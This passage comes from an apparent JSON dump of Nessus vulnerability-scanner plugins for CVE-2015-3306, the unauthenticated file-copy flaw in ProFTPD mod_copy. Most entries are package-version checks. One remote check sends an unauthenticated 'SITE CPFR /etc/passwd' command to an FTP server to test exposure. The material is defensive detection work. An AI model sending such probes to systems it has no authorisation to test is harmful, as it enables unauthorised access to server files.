get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"proftpd-1.3.5-5.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"proftpd\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:47:48", "description": "Vadim Melihow discovered that in proftpd-dfsg, an FTP server, the mod_copy module allowed unauthenticated users to copy files around on the server, and possibly to execute arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-20T00:00:00", "type": "nessus", "title": "Debian DSA-3263-1 : proftpd-dfsg - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:proftpd-dfsg", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3263.NASL", "href": "https://www.tenable.com/plugins/nessus/83546", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3263. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83546);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_bugtraq_id(74238);\n script_xref(name:\"DSA\", value:\"3263\");\n\n script_name(english:\"Debian DSA-3263-1 : proftpd-dfsg - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vadim Melihow discovered that in proftpd-dfsg, an FTP server, the\nmod_copy module allowed unauthenticated users to copy files around on\nthe server, and possibly to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=782781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/proftpd-dfsg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/proftpd-dfsg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3263\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the proftpd-dfsg packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.3.4a-5+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.3.5-1.1+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:proftpd-dfsg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-basic\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-dev\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-doc\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-mod-ldap\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-mod-mysql\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-mod-odbc\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-mod-pgsql\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-mod-sqlite\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-basic\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-dev\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-doc\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-geoip\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-ldap\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-mysql\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-odbc\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-pgsql\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-sqlite\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:46:42", "description": "Vadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by unauthenticated clients\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nNote that mod_copy is not loaded/enabled by default in the Fedora package.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-04T00:00:00", "type": "nessus", "title": "Fedora 22 : proftpd-1.3.5-6.fc22 (2015-7164)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:proftpd", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-7164.NASL", "href": "https://www.tenable.com/plugins/nessus/83224", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-7164.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83224);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_xref(name:\"FEDORA\", value:\"2015-7164\");\n\n script_name(english:\"Fedora 22 : proftpd-1.3.5-6.fc22 (2015-7164)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vadim Melihow reported a critical issue with proftpd installations\nthat use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy\nallows these commands to be used by unauthenticated clients\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nNote that mod_copy is not loaded/enabled by default in the Fedora\npackage.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212386\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?25c5c14c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"proftpd-1.3.5-6.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"proftpd\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:47:08", "description": "Vadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by *unauthenticated clients*\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nThis update contains a backported fix for this issue.\n\nNote that mod_copy is not loaded/enabled by default in the Fedora package.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-04T00:00:00", "type": "nessus", "title": "Fedora 20 : proftpd-1.3.4e-3.fc20 (2015-6401)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:proftpd", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2015-6401.NASL", "href": "https://www.tenable.com/plugins/nessus/83198", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-6401.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83198);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_xref(name:\"FEDORA\", value:\"2015-6401\");\n\n script_name(english:\"Fedora 20 : proftpd-1.3.4e-3.fc20 (2015-6401)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vadim Melihow reported a critical issue with proftpd installations\nthat use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy\nallows these commands to be used by *unauthenticated clients*\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nThis update contains a backported fix for this issue.\n\nNote that mod_copy is not loaded/enabled by default in the Fedora\npackage.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212386\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3fb4bf19\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"proftpd-1.3.4e-3.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"proftpd\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:48:42", "description": "The remote host is running a version of ProFTPD that is affected by an information disclosure vulnerability in the mod_copy module due to the SITE CPFR and SITE CPTO commands being available to unauthenticated clients. An unauthenticated, remote attacker can exploit this flaw to read and write to arbitrary files on any web accessible path on the host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-16T00:00:00", "type": "nessus", "title": "ProFTPD mod_copy Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2020-03-27T00:00:00", "cpe": ["cpe:/a:proftpd:proftpd"], "id": "PROFTPD_1_3_5_INFO_DISC.NASL", "href": "https://www.tenable.com/plugins/nessus/84215", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84215);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/27\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_bugtraq_id(74238);\n script_xref(name:\"EDB-ID\", value:\"36742\");\n script_xref(name:\"EDB-ID\", value:\"36803\");\n\n script_name(english:\"ProFTPD mod_copy Information Disclosure\");\n script_summary(english:\"Checks if SITE CPFR command is available without authentication.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a ProFTPD module that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of ProFTPD that is affected by an\ninformation disclosure vulnerability in the mod_copy module due to the\nSITE CPFR and SITE CPTO commands being available to unauthenticated\nclients. An unauthenticated, remote attacker can exploit this flaw to\nread and write to arbitrary files on any web accessible path on the\nhost.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3306\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:proftpd:proftpd\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FTP\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_anonymous.nasl\");\n script_require_keys(\"ftp/proftpd\");\n script_require_ports(\"Services/ftp\", 21);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"ftp/proftpd\");\n\n# Connect to the FTP server\nport = get_ftp_port(default: 21, broken:TRUE);\n\nsoc = open_sock_tcp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL, port);\n\nftp_debug(str:\"custom banner\");\nr = ftp_recv_line(socket:soc);\nif (isnull(r)) audit(AUDIT_RESP_NOT, port);\n\nc = 'SITE CPFR /etc/passwd \\r\\n';\nsend(socket:soc, data:c);\nb = recv(socket:soc, length:3);\n\nftp_close(socket: soc);\n\nif(b == \"350\")\n{\n if (report_verbosity > 0) security_hole(port:port, extra:'\\nNessus received a 350 response from sending the following unauthenticated request :\\n\\nSITE CPFR /etc/passwd\\n');\n else security_hole(port);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, 'ProFTPD', port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:48:44", "description": "The ftp server ProFTPD was updated to 1.3.5a to fix one security issue.\n\nThe following vulnerability was fixed :\n\n - CVE-2015-3306: Unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy (boo#927290)\n\nIn addition, proftpd was updated to 1.3.5a to fix a number of upstream bugs and improve functionality.", "cvss3": {"score": null, "vector": null}, "published": "2015-06-12T00:00:00", "type": "nessus", "title": "openSUSE Security Update : proftpd (openSUSE-2015-410)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4359", "CVE-2015-3306"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:proftpd", "p-cpe:/a:novell:opensuse:proftpd-debuginfo", "p-cpe:/a:novell:opensuse:proftpd-debugsource", "p-cpe:/a:novell:opensuse:proftpd-devel", "p-cpe:/a:novell:opensuse:proftpd-lang", "p-cpe:/a:novell:opensuse:proftpd-ldap", "p-cpe:/a:novell:opensuse:proftpd-ldap-debuginfo", "p-cpe:/a:novell:opensuse:proftpd-mysql", "p-cpe:/a:novell:opensuse:proftpd-mysql-debuginfo", "p-cpe:/a:novell:opensuse:proftpd-pgsql", "p-cpe:/a:novell:opensuse:proftpd-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:proftpd-radius", "p-cpe:/a:novell:opensuse:proftpd-radius-debuginfo", "p-cpe:/a:novell:opensuse:proftpd-sqlite", "p-cpe:/a:novell:opensuse:proftpd-sqlite-debuginfo", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-410.NASL", "href": "https://www.tenable.com/plugins/nessus/84134", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-410.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84134);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-4359\", \"CVE-2015-3306\");\n\n script_name(english:\"openSUSE Security Update : proftpd (openSUSE-2015-410)\");\n script_summary(english:\"Check for the openSUSE-2015-410 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The ftp server ProFTPD was updated to 1.3.5a to fix one security\nissue.\n\nThe following vulnerability was fixed :\n\n - CVE-2015-3306: Unauthenticated copying of files via SITE\n CPFR/CPTO allowed by mod_copy (boo#927290)\n\nIn addition, proftpd was updated to 1.3.5a to fix a number of upstream\nbugs and improve functionality.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=927290\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-radius-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 